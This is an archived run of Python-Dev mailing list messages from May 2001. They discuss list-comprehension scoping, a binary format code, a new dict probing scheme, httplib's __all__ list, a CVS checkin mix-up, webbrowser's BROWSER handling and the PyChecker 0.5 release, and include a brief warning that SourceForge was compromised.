In-Reply-To: <LNBBLJKPBEHFEDALKOLCAEGOKFAA.tim.one@home.com>
Message-ID: <200105310516.RAA01760@s454.cosc.canterbury.ac.nz>

Tim:

> >>> base3 = [x[:] for x[0] in digits for x[1] in digits for x[2] in
>              digits]

Yikes! That would be clearer as

  [[x,y,z] for x in digits for y in digits for z in digits]

I'll concede it's nowhere near as much fun, though...

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From greg at cosc.canterbury.ac.nz  Thu May 31 07:16:41 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 31 May 2001 17:16:41 +1200 (NZST)
Subject: [Python-Dev] Iteration variables and list comprehensions
In-Reply-To: <LNBBLJKPBEHFEDALKOLCEEGPKFAA.tim.one@home.com>
Message-ID: <200105310516.RAA01763@s454.cosc.canterbury.ac.nz>

Tim:

> Needs a PEP, and possibly
> even an associated future-statement.  Overall, I'm more in favor of changing
> it than not.

If we do this, we also need to consider whether we want
to make the corresponding change to regular for-loops.
Seems to me that all the reasons it's a good idea for
listcomps apply to for-loops as well.

Another advantage of changing both together is that
we can continue to describe listcomp semantics in terms
of for-loops instead of lambdas. Then we won't have to go 
into hiding until Guido dies or lifts the fatwah against
us.

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From greg at cosc.canterbury.ac.nz  Thu May 31 07:17:16 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Thu, 31 May 2001 17:17:16 +1200 (NZST)
Subject: [Python-Dev] %b format?
In-Reply-To: <LNBBLJKPBEHFEDALKOLCIEHJKFAA.tim.one@home.com>
Message-ID: <200105310517.RAA01766@s454.cosc.canterbury.ac.nz>

Tim:

> On the fifth hand, I doubt anyone would want to add new % format codes for
> bases {2..36} - {2, 8, 10, 16}.

So, just add one general one:

  %m.nb

with n being the base. If n defaults to 2, you can read the "b"
as either "base" or "binary".

Literals:

  0b(5)21403       general
  0b11001101       binary

Conversion functions:

  base(x, n)       general
  bin(x)           equivalent to base(x, 2) (for symmetry with
                                             existing hex, oct)

Type slots:

  __base__(x, n)

Backwards compatibility measures:

  hex(x) --> base(x, 16)
  oct(x) --> base(x, 8)
  bin(x) --> base(x, 2)

  base(x, n) checks __hex__ and __oct__ slots for special cases
             of n=16 and n=8, falls back on __base__

There, that takes care of integers. Anyone want to do the
equivalent for floats ?-)

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From esr at thyrsus.com  Thu May 31 08:01:54 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Thu, 31 May 2001 02:01:54 -0400
Subject: [Python-Dev] %b format?
In-Reply-To: <200105310517.RAA01766@s454.cosc.canterbury.ac.nz>; from greg@cosc.canterbury.ac.nz on Thu, May 31, 2001 at 05:17:16PM +1200
References: <LNBBLJKPBEHFEDALKOLCIEHJKFAA.tim.one@home.com> <200105310517.RAA01766@s454.cosc.canterbury.ac.nz>
Message-ID: <20010531020154.A4404@thyrsus.com>

Greg Ewing <greg at cosc.canterbury.ac.nz>:
> So, just add one general one:
> 
>   %m.nb
> 
> with n being the base. If n defaults to 2, you can read the "b"
> as either "base" or "binary".

I had a similar idea, but your version is more elegant.
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

The common argument that crime is caused by poverty is a kind of
slander on the poor.
	-- H. L. Mencken


From tim_one at email.msn.com  Thu May 31 08:20:21 2001
From: tim_one at email.msn.com (Tim Peters)
Date: Thu, 31 May 2001 02:20:21 -0400
Subject: [Python-Dev] Iteration variables and list comprehensions
In-Reply-To: <200105310516.RAA01763@s454.cosc.canterbury.ac.nz>
Message-ID: <LNBBLJKPBEHFEDALKOLCIEIOKFAA.tim_one@email.msn.com>

[Greg Ewing]
> If we do this, we also need to consider whether we want
> to make the corresponding change to regular for-loops.
> Seems to me that all the reasons it's a good idea for
> listcomps apply to for-loops as well.

I expect there's no chance:  unlike listcomps, for-loops allow break
statements, and search loops that use the for index after a break (and out
of the loop!) are common.

> Another advantage of changing both together is that
> we can continue to describe listcomp semantics in terms
> of for-loops

But I'm afraid that's also an advantage of leaving both alone.

> instead of lambdas.
>
> Then we won't have to go into hiding until Guido dies or lifts
> the fatwah against us.

Death won't stop him -- he's Dutch <wink>.


From tim_one at email.msn.com  Thu May 31 08:28:04 2001
From: tim_one at email.msn.com (Tim Peters)
Date: Thu, 31 May 2001 02:28:04 -0400
Subject: [Python-Dev] %b format?
In-Reply-To: <200105310517.RAA01766@s454.cosc.canterbury.ac.nz>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEIPKFAA.tim_one@email.msn.com>

[Greg Ewing]
> So, just add one general one:
>
>   %m.nb
>
> with n being the base. If n defaults to 2, you can read the "b"
> as either "base" or "binary".

Except .n has a different meaning already for integer conversions:

>>> "%.5d" % 2
'00002'
>>> "%.10o" % 377
'0000000571'
>>>

It would be inconsistent to hijack it to mean something else here.

> Literals:
>
>   0b(5)21403       general

I've actually got no use for bases outside {2, 8, 10, 16), and have never
heard a request for them either, so I'd be at best -0.  Better to stop
documenting the full truth about int() <0.9 wink>.

>   0b11001101       binary

+1.

> Conversion functions:
>
>   base(x, n)       general

-0, as above.

>   bin(x)           equivalent to base(x, 2) (for symmetry with
>                                              existing hex, oct)

+1 if binary literals are added.

> Type slots:
>
>   __base__(x, n)

Given the tenor of the above, add __bin__ and call it a day.

> Backwards compatibility measures:
>
>   hex(x) --> base(x, 16)
>   oct(x) --> base(x, 8)
>   bin(x) --> base(x, 2)
>
>   base(x, n) checks __hex__ and __oct__ slots for special cases
>              of n=16 and n=8, falls back on __base__
>
> There, that takes care of integers. Anyone want to do the
> equivalent for floats ?-)

Note that C99 introduces a hex notation for floats.


From mal at lemburg.com  Thu May 31 09:20:11 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Thu, 31 May 2001 09:20:11 +0200
Subject: [Python-Dev] SF hacked
References: <20010531035248.G690@xs4all.nl>
Message-ID: <3B15F0AB.34F2F664@lemburg.com>

Thomas Wouters wrote:
> 
> It *seems*, from this site:
> 
> http://66.92.75.28/~vladimir/themes-org.html
> 
> that SourceForge has been hacked, and more seriously than SF first admits
> (if I'm to believe the arrogant sprouting of some script-kiddie, anyway. :)
> And the same goes for apache.org, it looks like. Anyway, if anyone connected
> *from* any of sourceforge's machines to anywhere else, in the last couple of
> months, they'll be well advised to change their passwords and check for
> intruders. The same goes if you connect through ssh and (foolishly ;)
> allowed ssh-agent-forwarding to the SF machines. In that case, better check
> all the machines that ssh-agent would give you unpassworded access to for
> logins you don't recognize. The site above lists a number of sniffed
> passwords, in case you want to check, but there's no reason for the hacker
> not to have even more sniffed passwords lying about :)
> 
> And if you have a login on apache.org, you probably want to change your
> password in any case.... the above listed site has what seems to be a copy
> of the shadow password file.

FYI, the file's contents are no longer available it seems. Still,
SF seems to be alarmed about this:

*****************************************************************************
                I M P O R T A N T   P L E A S E     R E A D
*****************************************************************************

        If you are seeing this it's because we've failed over from
        pr-shell1.

        This is a failover server only.  As soon as pr-shell1 is better we
        will cut back to it.  So please do not start any daemon process
        that you care about.

                                                - The SF Staff


About the password change: this doesn't seem to be possible on
the failover machine (I get a permission denied message).

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal at lemburg.com  Thu May 31 09:33:36 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Thu, 31 May 2001 09:33:36 +0200
Subject: [Python-Dev] One more dict trick
References: <LNBBLJKPBEHFEDALKOLCGEIFKFAA.tim.one@home.com>
Message-ID: <3B15F3D0.AD646102@lemburg.com>

Tim Peters wrote:
> 
> If anyone has an app known or suspected to be sensitive to dict timing,
> please try the patch here.  Best I've been able to tell, it's a win.  But
> it's a radical change in approach, so I don't want to rush it.
> 
> This gets rid of the polynomial machinery entirely, along with the branches
> associated with updating the things, and the dictobject struct member
> holding the table's poly.  Instead it relies on that
> 
>     i = (5*i + 1) % n
> 
> is a full-period RNG whenever n is a power of 2 (that's what guarantees it
> will visit every slot), but perturbs that by adding in a few bits from the
> full hash code shifted right each time (that's what guarantees every bit of
> the hash code eventually influences the probe sequence, avoiding simple
> quadratic-time degenerate cases).

Cool idea... rips out all that algebra garble and replaces it with 
random beauty :-)

In any case, this will avoid use the trouble of having to check
those poly numbers every time Intel decides to bump the register
width by another factor of two ;-)

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From esr at thyrsus.com  Thu May 31 10:43:32 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Thu, 31 May 2001 04:43:32 -0400
Subject: [Python-Dev] One more dict trick
In-Reply-To: <3B15F3D0.AD646102@lemburg.com>; from mal@lemburg.com on Thu, May 31, 2001 at 09:33:36AM +0200
References: <LNBBLJKPBEHFEDALKOLCGEIFKFAA.tim.one@home.com> <3B15F3D0.AD646102@lemburg.com>
Message-ID: <20010531044332.B5026@thyrsus.com>

M.-A. Lemburg <mal at lemburg.com>:
> In any case, this will avoid use the trouble of having to check
> those poly numbers every time Intel decides to bump the register
> width by another factor of two ;-)

This seems unlikely.  

2^64 = 18446744073709551616, which is roughly 10 ^ 22.  Let's assume 
a memory density, of, say 2^20 machine words or roughly 8 megabytes per 
cubic centimeter (much, *much* better than we'll be able to do for the 
forseeable future -- remember power distribution and heat dissipation).
Then, approximating the cubic relation between a sphere's volume and area 
by lopping off a power of four, we see that 2^64 64-bit words of memory 
would occupy a sphere of roughly 2^(64 - 20 - 2) cm radius, or about 
17 million kilometers.  

This is roughly twice the diameter of the Sun.  64-bit computers
aren't going to run out of address space any time soon.

64-bit clocks counting seconds will turn over in approximately six
trillion years, long after the expansion of the Universe will have
dropped its energy density low enough to make computation...well, 
let's just say "difficult" and leave it at that.

Nobody needs 128 bits of integer or floating-point precision, either.
There's basically no source of data to compute with that's got
anywhere near 22 significant digits of accuracy -- 48 bits is
about the most people in scientific computing ever use.
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

[President Clinton] boasts about 186,000 people denied firearms under
the Brady Law rules.  The Brady Law has been in force for three years.  In
that time, they have prosecuted seven people and put three of them in
prison.  You know, the President has entertained more felons than that at
fundraising coffees in the White House, for Pete's sake."
	-- Charlton Heston, FOX News Sunday, 18 May 1997


From mal at lemburg.com  Thu May 31 11:23:52 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Thu, 31 May 2001 11:23:52 +0200
Subject: [Python-Dev] One more dict trick
References: <LNBBLJKPBEHFEDALKOLCGEIFKFAA.tim.one@home.com> <3B15F3D0.AD646102@lemburg.com> <20010531044332.B5026@thyrsus.com>
Message-ID: <3B160DA8.B9FF9AC2@lemburg.com>

"Eric S. Raymond" wrote:
> 
> M.-A. Lemburg <mal at lemburg.com>:
> > In any case, this will avoid us the trouble of having to check
> > those poly numbers every time Intel decides to bump the register
> > width by another factor of two ;-)
> 
> This seems unlikely.
> 
> 2^64 = 18446744073709551616, which is roughly 10 ^ 22.  Let's assume
> a memory density, of, say 2^20 machine words or roughly 8 megabytes per
> cubic centimeter (much, *much* better than we'll be able to do for the
> forseeable future -- remember power distribution and heat dissipation).

Where did you get those numbers from ? There are memory sticks
with 128 MB around and these measure about 2.5 cm^2 * 1 mm.

> Then, approximating the cubic relation between a sphere's volume and area
> by lopping off a power of four, we see that 2^64 64-bit words of memory
> would occupy a sphere of roughly 2^(64 - 20 - 2) cm radius, or about
> 17 million kilometers.
> 
> This is roughly twice the diameter of the Sun.  64-bit computers
> aren't going to run out of address space any time soon.
> 
> 64-bit clocks counting seconds will turn over in approximately six
> trillion years, long after the expansion of the Universe will have
> dropped its energy density low enough to make computation...well,
> let's just say "difficult" and leave it at that.
> 
> Nobody needs 128 bits of integer or floating-point precision, either.
> There's basically no source of data to compute with that's got
> anywhere near 22 significant digits of accuracy -- 48 bits is
> about the most people in scientific computing ever use.

Just you wait... someday marketing people will probably invent the
world memory facility and start assigning a few hundred
Terabytes for everyone on this planet to use for his/her data 
storage -- store once, use everywhere ;-)

Let's assume we have 12e9 people on this planet by that time, then
we'll need 12e9*100e12 = 1.2e24 bytes of central storage... or
roughly 2^80 bytes per civilization.

Of course, they will want to run Python in order to manage
that data and so will all those Palm uses hooking up to the
facility... ;-)

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From esr at thyrsus.com  Thu May 31 12:31:07 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Thu, 31 May 2001 06:31:07 -0400
Subject: [Python-Dev] One more dict trick
In-Reply-To: <3B160DA8.B9FF9AC2@lemburg.com>; from mal@lemburg.com on Thu, May 31, 2001 at 11:23:52AM +0200
References: <LNBBLJKPBEHFEDALKOLCGEIFKFAA.tim.one@home.com> <3B15F3D0.AD646102@lemburg.com> <20010531044332.B5026@thyrsus.com> <3B160DA8.B9FF9AC2@lemburg.com>
Message-ID: <20010531063107.B5510@thyrsus.com>

M.-A. Lemburg <mal at lemburg.com>:
> > 2^64 = 18446744073709551616, which is roughly 10 ^ 22.  Let's assume
> > a memory density, of, say 2^20 machine words or roughly 8 megabytes per
> > cubic centimeter (much, *much* better than we'll be able to do for the
> > forseeable future -- remember power distribution and heat dissipation).
> 
> Where did you get those numbers from ? There are memory sticks
> with 128 MB around and these measure about 2.5 cm^2 * 1 mm.

Remember power distribution and heat dissipation.  You can't just figure 
volume of the memory ICs, you have to include power and cooling and structural
support too.  I eyeballed some DRAM modules I had lying around.

In any case, my figures aren't that sensitive to memory density.  If
I'm off by a factor of 64 the diameter of the memory sphere unly drops
by a factor of four (it's that cube-root relationship between volume
and radius).  So it's only half the radius of the Sun.  That's still
way, *way* more mass than all the planets in the Solar System put
together.

> Just you wait... someday marketing people will probably invent the
> world memory facility and start assigning a few hundred
> Terabytes for everyone on this planet to use for his/her data 
> storage -- store once, use everywhere ;-)
> 
> Let's assume we have 12e9 people on this planet by that time, then
> we'll need 12e9*100e12 = 1.2e24 bytes of central storage... or
> roughly 2^80 bytes per civilization.

Nah.  Individual storage requirements would never get that large.
Bill Joy did a study on this once and figured out that human beings
can generate about 14GB of text during their lifetimes, max.  In a
system like the Web-on-steroids one you're supposing, higher-volume
stuff like streaming video or Linux-kernel archives would be stored
*once* with URLs pointing at them from peoples' individual stores.

One terabyte (2^40) per person leaves plenty of headroom (two orders
of magnitude larger).  We could still handle a world population of
2^24 or roughly 16 billion people.  (I think the size of the Library
of Congress has been estimated at several thousand terabytes.)
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

I don't like the idea that the police department seems bent on keeping
a pool of unarmed victims available for the predations of the criminal
class.
         -- David Mohler, 1989, on being denied a carry permit in NYC


From thomas at xs4all.net  Thu May 31 12:45:33 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Thu, 31 May 2001 12:45:33 +0200
Subject: [Python-Dev] One more dict trick
In-Reply-To: <20010531044332.B5026@thyrsus.com>; from esr@thyrsus.com on Thu, May 31, 2001 at 04:43:32AM -0400
References: <LNBBLJKPBEHFEDALKOLCGEIFKFAA.tim.one@home.com> <3B15F3D0.AD646102@lemburg.com> <20010531044332.B5026@thyrsus.com>
Message-ID: <20010531124533.J690@xs4all.nl>

On Thu, May 31, 2001 at 04:43:32AM -0400, Eric S. Raymond wrote:
> M.-A. Lemburg <mal at lemburg.com>:

> > In any case, this will avoid use the trouble of having to check
> > those poly numbers every time Intel decides to bump the register
> > width by another factor of two ;-)

> This seems unlikely.  

Why ? Bumping register size doesn't mean Intel expects to use it all as
address space. They could be used for video-processing, or to represent a
modest range of rationals <wink>, or to help core 'net routers deal with
those nasty IPv6 addresses. I'm sure cryptomunchers would like bigger
registers as well.

Oh wait... I get it! You were trying to get yourself in the historybooks as
the guy that said "64 bits ought to be enough for everyone" :-)

-- 
Thomas Wouters <thomas at xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From neal at metaslash.com  Wed May 30 04:49:45 2001
From: neal at metaslash.com (Neal Norwitz)
Date: Tue, 29 May 2001 22:49:45 -0400
Subject: [Python-Dev] PyChecker v0.5 released
Message-ID: <mailman.991257181.1069.clpa-moderators@python.org>

I was finally able to get version 0.5 out.  Just in case this is the
first time you are seeing this message, or you forgot what PyChecker is:

    PyChecker is a tool for finding common bugs in python source code.
    It finds problems that are typically caught by a compiler for less
    dynamic languages, like C and C++.  Because of the dynamic nature
    of python, some warnings may be incorrect; however,
    spurious warnings should be fairly infrequent.

The highlights are that code at the module scope is now checked.
There is still a problem with class variables and globals that are default
parameter values.  But other than that, there should be no more spurious
Variable unused warnings.

Code that makes PyChecker raise an exception should now be caught in most
cases and this produces a warning.  Please mail me if you find it blowing
up on your code.  The last line processed is shown in the warning, so
if you include some context, I can hopefully fix the problem.

Also, PyChecker should really use the files passed on the command line,
even if it uses the same module name internally.  So it will check your
warn.py, not PyChecker's warn.py.

Feedback, comments, criticisms, new ideas, better ideas, etc. are all 
greatly appreciated.  Thanks for everyone who has taken the time to mail me.
If you can think of common mistakes that are made that PyChecker doesn't
find, please let me know.

Here's the CHANGELOG:
  * Catch internal errors "gracefully" and turn into a warning
  * Add checking of most module scoped code
  * Add pychecker subdir to imports to prevent filename conflicts
  * Don't produce unused local variable warning if variable name == '_'
  * Add -g/--allglobals option to report all global warnings, not just first
  * Add -V/--varlist option to selectively ignore variable not used warnings
  * Add test script and expected results
  * Print all instructions when using debug (-d/--debug)
  * Overhaul internal stack handling so we can look for more problems
  * Fix glob'ing problems (all args after glob were ignored)
  * Fix spurious Base class __init__ not called
  * Fix exception on code like:  ['xxx'].index('xxx')
  * Fix exception on code like:  func(kw=(a < b))
  * Fix line numbers for import statements

PyChecker is available on Source Forge:
    Web page:           http://pychecker.sourceforge.net/
    Project page:       http://sourceforge.net/projects/pychecker/

Neal
--
pychecker at metaslash.com


From beazley at cs.uchicago.edu  Thu May 31 15:34:57 2001
From: beazley at cs.uchicago.edu (David Beazley)
Date: Thu, 31 May 2001 08:34:57 -0500 (CDT)
Subject: [Python-Dev] RE: Iteration variables and list comprehensions
In-Reply-To: <E155KrW-00029v-00@mail.python.org>
References: <E155KrW-00029v-00@mail.python.org>
Message-ID: <15126.18561.448105.608783@gargoyle.cs.uchicago.edu>

Greg Ewing writes: 
 > Another advantage of changing both together is that
 > we can continue to describe listcomp semantics in terms
 > of for-loops instead of lambdas.

Is this really an advantage?  To me, the lambda semantics are a lot
more intuitive in terms of matching the way that list comprehensions
are actually used and ought to work (although I will agree that the
for-loop explanation is a good way to describe the internals of what a
list comprehension actually does).

I think I would be opposed to changing normal for-loop semantics to
match any change made in list-comprehensions. There are too many cases
where you use a loop variable after finishing a loop and I suspect
that this would break a huge amount of code. For example:

    for i in r:
        ...
        if whatever: break

    print i

Besides, the semantic mismatch created between a listcomp and a
for-loop pales in comparison to the mismatch that currently exists
between the behavior of listcomps and all of the other operators.  Of
course, that's just my opinion--I could be wrong.

 > Then we won't have to go 
 > into hiding until Guido dies or lifts the fatwah against us.

fatwah?  Uh...  should I start talking to the witness protection
program folks?

Cheers,

Dave


From skip at pobox.com  Thu May 31 20:02:51 2001
From: skip at pobox.com (Skip Montanaro)
Date: Thu, 31 May 2001 13:02:51 -0500
Subject: [Python-Dev] Re: 2.1 strangness
In-Reply-To: <lCoIXKAB3mF7Ew5A@jessikat.demon.co.uk>
References: <lCoIXKAB3mF7Ew5A@jessikat.demon.co.uk>
Message-ID: <15126.34635.67975.31473@beluga.mojam.com>

>>>>> "Robin" == Robin Becker <robin at jessikat.fsnet.co.uk> writes:

    Robin> from httplib import *

    Robin> class Bongo(HTTPConnection):
    Robin>         pass
    ...
    Robin> NameError: name 'HTTPConnection' is not defined

It was a brain fart on my part when creating httplib.__all__.
HTTPConnection was not included in that list.  I will check in a fix.
In the 2.1 release __all__ was defined as 

    __all__ = ["HTTP"]

I have changed that to

    __all__ = ["HTTP", "HTTPResponse", "HTTPConnection", "HTTPSConnection",
	       "HTTPException", "NotConnected", "UnknownProtocol",
	       "UnknownTransferEncoding", "IllegalKeywordArgument",
	       "UnimplementedFileMode", "IncompleteRead",
	       "ImproperConnectionState", "CannotSendRequest", "CannotSendHeader",
	       "ResponseNotReady", "BadStatusLine", "error"]

and will check the change into CVS shortly. (Thomas, keep an eye open for
this as an addition to 2.1.1.)

The workaround I would choose is to not use from "httplib import *":

    import httplib

    class Bongo(httplib.HTTPConnection):
        pass

    Robin> Changing the * to HTTPConnection in ttt.py removes the problem.

Yup, that will also work.

Before anyone asks, "Who died and make Skip King?", the scenario as I recall
it was that the semantics of __all__ got settled on during discussions on
python-dev (the goal of __all__ being to minimize namespace pollution by
"from ... *"), but nobody stepped up immediately to do the gtunt work, so I
volunteered.  The problem in relying on one person (well, at least this one
person) to do this was that I had only the following tools at my disposal to
decide what belonged in __all__:

    * what was documented in the lib reference manual (which was at times
      incomplete)
    * my experience with the various modules (some of which was specialized,
      some of which was nonexistent)
    * the standard library (which generally doesn't use "from ... *" much)
    * input from python-dev (whose members also appear not to use "from
      ... *" very liberally)

In retrospect, I probably should have polled c.l.py with a summary of what I
came up with before the 2.1 ship date.  If people would like me to do that
now (before 2.2 gets anywhere close to release) to try and fill in as many
missing symbols as possible, let me know.

-- 
Skip Montanaro (skip at pobox.com)
(847)971-7098


From skip at pobox.com  Thu May 31 20:06:01 2001
From: skip at pobox.com (Skip Montanaro)
Date: Thu, 31 May 2001 13:06:01 -0500
Subject: [Python-Dev] Damn... I think I might have just muffed a checkin
Message-ID: <15126.34825.167026.520535@beluga.mojam.com>

I just updated httplib.py to expand the list of names in its __all__ list.
I was operating on version 1.34.  After the checkin I am looking at version
1.34.2.1.  I see that Lib/CVS/Tag exists in my directory tree and says
"release21-maint".  Did I muff it?  If so, how should I do an unmuff
operation?

Skip


From robin at jessikat.fsnet.co.uk  Thu May 31 20:33:02 2001
From: robin at jessikat.fsnet.co.uk (Robin Becker)
Date: Thu, 31 May 2001 19:33:02 +0100
Subject: [Python-Dev] Re: 2.1 strangness
In-Reply-To: <15126.34635.67975.31473@beluga.mojam.com>
References: <lCoIXKAB3mF7Ew5A@jessikat.demon.co.uk>
 <15126.34635.67975.31473@beluga.mojam.com>
Message-ID: <s8$qoXAe5oF7EwbX@jessikat.fsnet.co.uk>

In message <15126.34635.67975.31473 at beluga.mojam.com>, Skip Montanaro
<skip at pobox.com> writes
>>>>>> "Robin" == Robin Becker <robin at jessikat.fsnet.co.uk> writes:
>
>    Robin> from httplib import *
>
>    Robin> class Bongo(HTTPConnection):
>    Robin>         pass
>    ...
>    Robin> NameError: name 'HTTPConnection' is not defined
>
>It was a brain fart on my part when creating httplib.__all__.
>HTTPConnection was not included in that list.  I will check in a fix.
>In the 2.1 release __all__ was defined as 
>
>    __all__ = ["HTTP"]
>
>I have changed that to
>
>    __all__ = ["HTTP", "HTTPResponse", "HTTPConnection", "HTTPSConnection",
>              "HTTPException", "NotConnected", "UnknownProtocol",
>              "UnknownTransferEncoding", "IllegalKeywordArgument",
>              "UnimplementedFileMode", "IncompleteRead",
>              "ImproperConnectionState", "CannotSendRequest", 
>"CannotSendHeader",
>              "ResponseNotReady", "BadStatusLine", "error"]

thanks; I'm still a bit puzzled as to the exact semantics. It just looks
wrong. Is __all__ the only way to get things into the * version of
import? Presumably HTTPConnection is being marked as a potential global
in the compile phase.
-- 
Robin Becker


From skip at pobox.com  Thu May 31 21:27:12 2001
From: skip at pobox.com (Skip Montanaro)
Date: Thu, 31 May 2001 14:27:12 -0500
Subject: [Python-Dev] Re: 2.1 strangness
In-Reply-To: <s8$qoXAe5oF7EwbX@jessikat.fsnet.co.uk>
References: <lCoIXKAB3mF7Ew5A@jessikat.demon.co.uk>
	<15126.34635.67975.31473@beluga.mojam.com>
	<s8$qoXAe5oF7EwbX@jessikat.fsnet.co.uk>
Message-ID: <15126.39696.370516.926735@beluga.mojam.com>

    Robin> thanks; I'm still a bit puzzled as to the exact semantics. It
    Robin> just looks wrong. Is __all__ the only way to get things into the
    Robin> * version of import?

Essentially, yes.  If you want to just dispense with it __all__together
(=:-o), you can textually replace __all__ with ___all__ in each of the
standard library modules:

    cd /usr/local/lib/python2.1
    for f in *.py ; do
	sed -e 's/___*all__/___all__/g' < $f > $f.tmp
	mv $f.tmp $f
    done

Note that I didn't touch any files in directories under the basic Lib
directory.

    Robin> Presumably HTTPConnection is being marked as a potential global
    Robin> in the compile phase.

It has nothing to do with module compilation.  The contents of __all__ are a
static thing in the text of the .py file, and thusfar almost entirely due to
me studying the inputs at hand and making a decision about what belonged and
what didn't.  Some python-dev people caught ommissions and added them before
the 2.1 release.  Other than that, the mistakes are all mine.

I had some misgivings about the whole thing during the midst of the task and
still do, but grumbled once and completed it.

Skip


From skip at pobox.com  Thu May 31 21:57:21 2001
From: skip at pobox.com (Skip Montanaro)
Date: Thu, 31 May 2001 14:57:21 -0500
Subject: [Python-Dev] weird webbrowser behavior
Message-ID: <15126.41505.987887.477670@beluga.mojam.com>

I'm using Gnome under Mandrake 8.0 and getting very strange results using
webbrowser (indirectly via pydoc).  Apparently, Gnome's init code sets the
BROWSER environment variable to "nautilus" (much to my surprise) and
webbrowser trusts it as the god's honest truth, even though nautilus has not
been registered with the webbrowser module (am I supposed to add that sort
of stuff to site.py?).  Accordingly, _tryorder is ['nautilus'] but doesn't
appear in _browser.keys() is ['lynx', 'links', 'netscape', 'kfm',
'mozilla'].  I think webbrowser should either ignore elements of BROWSER if
they have not previously been registered (and can't be found by _iscommand)
or try to register them using GenericBrowser.  Users are apparently not the
only people setting BROWSER, so the comment in the code:

    # It's the user's responsibility to register handlers for any unknown
    # browser referenced by this value, before calling open().

seems like flawed logic to me.

Skip


From esr at thyrsus.com  Thu May 31 22:08:21 2001
From: esr at thyrsus.com (Eric S. Raymond)
Date: Thu, 31 May 2001 16:08:21 -0400
Subject: [Python-Dev] weird webbrowser behavior
In-Reply-To: <15126.41505.987887.477670@beluga.mojam.com>; from skip@pobox.com on Thu, May 31, 2001 at 02:57:21PM -0500
References: <15126.41505.987887.477670@beluga.mojam.com>
Message-ID: <20010531160821.A10314@thyrsus.com>

Skip Montanaro <skip at pobox.com>:
> I think webbrowser should either ignore elements of BROWSER if
> they have not previously been registered (and can't be found by _iscommand)
> or try to register them using GenericBrowser.  Users are apparently not the
> only people setting BROWSER, so the comment in the code:

Fred Drake and I are co-responsible for that code.  If you want to patch it
to do this, I won't object.
-- 
		<a href="http://www.tuxedo.org/~esr/">Eric S. Raymond</a>

"They that can give up essential liberty to obtain a little temporary 
safety deserve neither liberty nor safety."
	-- Benjamin Franklin, Historical Review of Pennsylvania, 1759.


From fdrake at acm.org  Thu May 31 22:18:26 2001
From: fdrake at acm.org (Fred L. Drake, Jr.)
Date: Thu, 31 May 2001 16:18:26 -0400 (EDT)
Subject: [Python-Dev] Damn... I think I might have just muffed a checkin
In-Reply-To: <15126.34825.167026.520535@beluga.mojam.com>
References: <15126.34825.167026.520535@beluga.mojam.com>
Message-ID: <15126.42770.17954.452663@cj42289-a.reston1.va.home.com>

Skip Montanaro writes:
 > I just updated httplib.py to expand the list of names in its __all__ list.
 > I was operating on version 1.34.  After the checkin I am looking at version
 > 1.34.2.1.  I see that Lib/CVS/Tag exists in my directory tree and says
 > "release21-maint".  Did I muff it?  If so, how should I do an unmuff
 > operation?

  If that's really a muff, revert the change:

        cd .../Lib/
        cvs diff -r1.34.2.1 -r1.34 httplib.py | patch

and commit the new version as 1.34.2.2:

        cvs commit -m 'unmuff...' httplib.py


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From skip at pobox.com  Thu May 31 22:30:22 2001
From: skip at pobox.com (Skip Montanaro)
Date: Thu, 31 May 2001 15:30:22 -0500
Subject: [Python-Dev] weird webbrowser behavior
In-Reply-To: <20010531160821.A10314@thyrsus.com>
References: <15126.41505.987887.477670@beluga.mojam.com>
	<20010531160821.A10314@thyrsus.com>
Message-ID: <15126.43486.320228.376505@beluga.mojam.com>

    Eric> Fred Drake and I are co-responsible for that code.  If you want to
    Eric> patch it to do this, I won't object.

Here's a first pass that seems to work for me:

    https://sourceforge.net/tracker/index.php?func=detail&aid=429136&group_id=5470&atid=305470

though it doesn't attempt to recover if _tryorder winds up empty.

Skip


From skip at pobox.com  Thu May 31 22:48:40 2001
From: skip at pobox.com (Skip Montanaro)
Date: Thu, 31 May 2001 15:48:40 -0500
Subject: [Python-Dev] Damn... I think I might have just muffed a checkin
In-Reply-To: <15126.42770.17954.452663@cj42289-a.reston1.va.home.com>
References: <15126.34825.167026.520535@beluga.mojam.com>
	<15126.42770.17954.452663@cj42289-a.reston1.va.home.com>
Message-ID: <15126.44584.300357.360209@beluga.mojam.com>

    >> I just updated httplib.py to expand the list of names in its __all__
    >> list.  I was operating on version 1.34.  After the checkin I am
    >> looking at version 1.34.2.1.  I see that Lib/CVS/Tag exists in my
    >> directory tree and says "release21-maint".  Did I muff it?  If so,
    >> how should I do an unmuff operation?

    Fred>   If that's really a muff, revert the change:

